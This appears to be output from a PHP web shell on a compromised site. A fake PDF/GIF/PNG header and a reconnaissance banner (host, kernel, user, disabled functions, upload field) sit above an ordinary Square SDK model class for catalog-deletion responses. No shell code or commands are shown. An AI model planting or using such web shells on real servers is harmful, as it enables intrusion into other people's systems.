%PDF- %GIF98; %PNG;
Server : ApacheSystem : Linux host.digitalbabaji.in 4.18.0-513.11.1.el8_9.x86_64 #1 SMP Wed Jan 17 02:00:40 EST 2024 x86_64 User : addictionfreeind ( 1003) PHP Version : 7.2.34 Disable Function : exec,passthru,shell_exec,system Directory : /home/addictionfreeind/www/admin1/vendor/square/square/src/Models/ |
Upload File : |
<?php
declare(strict_types=1);
namespace Square\Models;
use stdClass;
class DeleteCatalogObjectResponse implements \JsonSerializable
{
/**
* @var Error[]|null
*/
private $errors;
/**
* @var string[]|null
*/
private $deletedObjectIds;
/**
* @var string|null
*/
private $deletedAt;
/**
* Returns Errors.
*
* Any errors that occurred during the request.
*
* @return Error[]|null
*/
public function getErrors(): ?array
{
return $this->errors;
}
/**
* Sets Errors.
*
* Any errors that occurred during the request.
*
* @maps errors
*
* @param Error[]|null $errors
*/
public function setErrors(?array $errors): void
{
$this->errors = $errors;
}
/**
* Returns Deleted Object Ids.
*
* The IDs of all catalog objects deleted by this request.
* Multiple IDs may be returned when associated objects are also deleted, for example
* a catalog item variation will be deleted (and its ID included in this field)
* when its parent catalog item is deleted.
*
* @return string[]|null
*/
public function getDeletedObjectIds(): ?array
{
return $this->deletedObjectIds;
}
/**
* Sets Deleted Object Ids.
*
* The IDs of all catalog objects deleted by this request.
* Multiple IDs may be returned when associated objects are also deleted, for example
* a catalog item variation will be deleted (and its ID included in this field)
* when its parent catalog item is deleted.
*
* @maps deleted_object_ids
*
* @param string[]|null $deletedObjectIds
*/
public function setDeletedObjectIds(?array $deletedObjectIds): void
{
$this->deletedObjectIds = $deletedObjectIds;
}
/**
* Returns Deleted At.
*
* The database [timestamp](https://developer.squareup.com/docs/build-basics/working-with-dates)
* of this deletion in RFC 3339 format, e.g., `2016-09-04T23:59:33.123Z`.
*/
public function getDeletedAt(): ?string
{
return $this->deletedAt;
}
/**
* Sets Deleted At.
*
* The database [timestamp](https://developer.squareup.com/docs/build-basics/working-with-dates)
* of this deletion in RFC 3339 format, e.g., `2016-09-04T23:59:33.123Z`.
*
* @maps deleted_at
*/
public function setDeletedAt(?string $deletedAt): void
{
$this->deletedAt = $deletedAt;
}
/**
* Encode this object to JSON
*
* @param bool $asArrayWhenEmpty Whether to serialize this model as an array whenever no fields
* are set. (default: false)
*
* @return mixed
*/
public function jsonSerialize(bool $asArrayWhenEmpty = false)
{
$json = [];
if (isset($this->errors)) {
$json['errors'] = $this->errors;
}
if (isset($this->deletedObjectIds)) {
$json['deleted_object_ids'] = $this->deletedObjectIds;
}
if (isset($this->deletedAt)) {
$json['deleted_at'] = $this->deletedAt;
}
$json = array_filter($json, function ($val) {
return $val !== null;
});
return (!$asArrayWhenEmpty && empty($json)) ? new stdClass() : $json;
}
}